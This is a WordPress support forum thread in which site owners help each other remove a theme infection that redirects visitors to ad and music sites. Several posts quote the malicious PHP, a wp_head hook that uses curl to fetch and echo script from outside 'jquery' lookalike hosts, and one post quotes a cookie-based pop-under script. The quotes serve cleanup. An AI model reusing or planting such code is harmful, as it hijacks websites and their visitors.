WordPress › Support » Unwanted Jquery (jquerys) script

watesam
Member
Posted 2 years ago #

walteravila@ Puedes hacer lo que yo hice, primero limpia tu pc http://download.eset.com/special/eos/esetsmartinstaller_enu.exe, segundo des-instala los plugins que instalaste últimamente y luego busca en http://urlquery.net/ agregando el link de tu pagina que no tengas el malware jquerys, la otra es buscar el codigo en la plantilla, pero puede ser difícil encontrarlo por que puede estar en cualquier php
espero te sirva a mi me funciono.

PeggyMe
Member
Posted 2 years ago #

So the code that needs to be removed is:

if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

Removing this code fixed one of my sites perfectly, but the other one still is not fixed.

PeggyMe
Member
Posted 2 years ago #

the code I had to remove was close to the code you found, but just a little bit different.
Here is the code that I removed

if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

elledios
Member
Posted 2 years ago #

:( Someone could take a look to my site? colegiosagradoscorazonesmedellin.edu.co i have the same trouble :(

PeggyMe
Member
Posted 2 years ago #

I looked at the source code to your site. I do not see the unwanted jquerys.org code. You must have fixed it?

elledios
Member
Posted 2 years ago #

Oh man, thanks for the help, for take the time to see the source
No, maybe is a plugin, but is impossible to guess when the redirection will happen.

Now i know that my template is not corrupted. Thanks a lot for that men!

I appreciate it

gemma dyson
Member
Posted 2 years ago #

I am facing same problem with my client website.. Trying to figure it out

gemma dyson
Member
Posted 2 years ago #

Does it also happens to forums?

johnnydoughnyc
Member
Posted 2 years ago #

I am having the same issue with this stupid downloadfreemusic.com hack....although since I'm now working on the site offline, I can't direct anyone to it for help. I did notice that when I view the source code, the script below is loaded on the Blog page. Any idea on where to find this in the files to delete?

<script type="text/javascript">
   var puShown = false;

   function doOpen(url)
   {
           if ( puShown == true )
           {
                   return true;
           }

           win = window.open(url, 'wmPu', 'toolbar,status,resizable,scrollbars,menubar,location,height=800,width=1200');
           if ( win )
           {
                   win.blur();
                   puShown = true;
           }
           return win;
   }

   function setCookie(name, value, time)
   {
       var expires = new Date();

       expires.setTime( expires.getTime() + time );

       document.cookie = name + '=' + value + '; expires=' + expires.toGMTString();
   }

   function getCookie(name) {
       var cookies = document.cookie.toString().split('; ');
       var cookie, c_name, c_value;

       for (var n=0; n<cookies.length; n++) {
           cookie  = cookies[n].split('=');
           c_name  = cookie[0];
           c_value = cookie[1];

           if ( c_name == name ) {
               return c_value;
           }
       }

       return null;
   }

   function initPu()
   {
           if ( document.attachEvent )
           {
                   document.attachEvent( 'onclick', checkTarget );
           }
           else if ( document.addEventListener )
           {
                   document.addEventListener( 'click', checkTarget, false );
           }
   }

   function checkTarget(e)
   {
       if ( !getCookie('popundr') ) {
           var e = e || window.event;
           var win = doOpen('http://www.downloadmusicfreenow.com/');

           setCookie('popundr', 1, 24*60*60*1000);
       }
   }

   initPu();
</script>

[Moderator Note: Please post code or markup snippets between backticks or use the code button. As it stands, your code may now have been permanently damaged/corrupted by the forum's parser.]

kmessinger
Moderator
Posted 2 years ago #

@johnnydoughnyc
When posting code please use the code button above. With more than 10 lines of code please use pastebin.com

johnnydoughnyc
Member
Posted 2 years ago #

Note to self! Sorry about that :) Btw, if anyone can help...I would be greatly appreciative.

johnnydoughnyc
Member
Posted 2 years ago #

Nevermind...genius over here figured it out ;)

wiremark
Member
Posted 2 years ago #

Any chance you could point me in the right direction Johnny?

I'm having a similar problem.

dzakyrov
Member
Posted 2 years ago #

if you use Modernize themes, just open the functions.php and check this

include'include/plugin/post.php'; // post function

add double-slash to make it as comment like this :

//include'include/plugin/post.php'; // post function << known to call malicious code

and just delete the post.php at your plugin folder.

HTH

Fiascos
Member
Posted 2 years ago #

Please someone help me. I have the same redirection problem on the same website. The only thing is that i checked everyhing listed here, and didnt find the problem. Can someone check my website?

I can also send you a theme in ZIP if needed.

esmi
Forum Moderator
Posted 2 years ago #

Please post your own topic.

profix
Member
Posted 2 years ago #

In my case infected file was include\functions-init.php.

URL: http://www.jquerye.com/jquery-1.6.3.min.js

Line 1: <?php if (!function_exists('insert_inj')){function insert_inj(){if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_inj');} ?>

Download theme folder first, then download Notepad++ and open it, go to Find -> Find in files type in jquery-1.6.3.min.js, browse your downloaded theme folder.

cdseo
Member
Posted 2 years ago #

就是这个问题之前我的站也出现过一样的情况注释掉

include'include/functions-init.php';

即可！

esmi
Forum Moderator
Posted 2 years ago #

Please post your own topic. And these are English language forums, so please use English.

Bizcus
Member
Posted 2 years ago #

I am using ClassiPress by Appthemes and have the same redirect problem going to downloadfreemusic.com. I can't find the infected file. Could someone please help. Thanks.

esmi
Forum Moderator
Posted 2 years ago #

Please post your own topic.

Bucki
Member
Posted 2 years ago #

I am glad, I got this ERROR message today
and made a research on this ... and whoooooppppsss!

Finally I know what caused my website to open
random ADS website .... I wondered what it was really!

I hope that melodious code is only within the FUNCTION.PHP
cos that is where I found it and deleted it.

If I need to remove any other code, let me know pls

Thanks

AndrewHeppinstall
Member
Posted 2 years ago #

Thank you so much for your help!

ditin
Member
Posted 2 years ago #

Could you pleas help me too?
My website has same problem.

My Website

esmi
Forum Moderator
Posted 2 years ago #

As per the Forum Welcome, please post your own topic. Your problem - despite any similarity in symptoms - is likely to be completely different.

WordPress.org

Forums

[resolved] [closed] Unwanted Jquery (jquerys) script (55 posts)

Topic Closed

About this Topic

Tags

Code is Poetry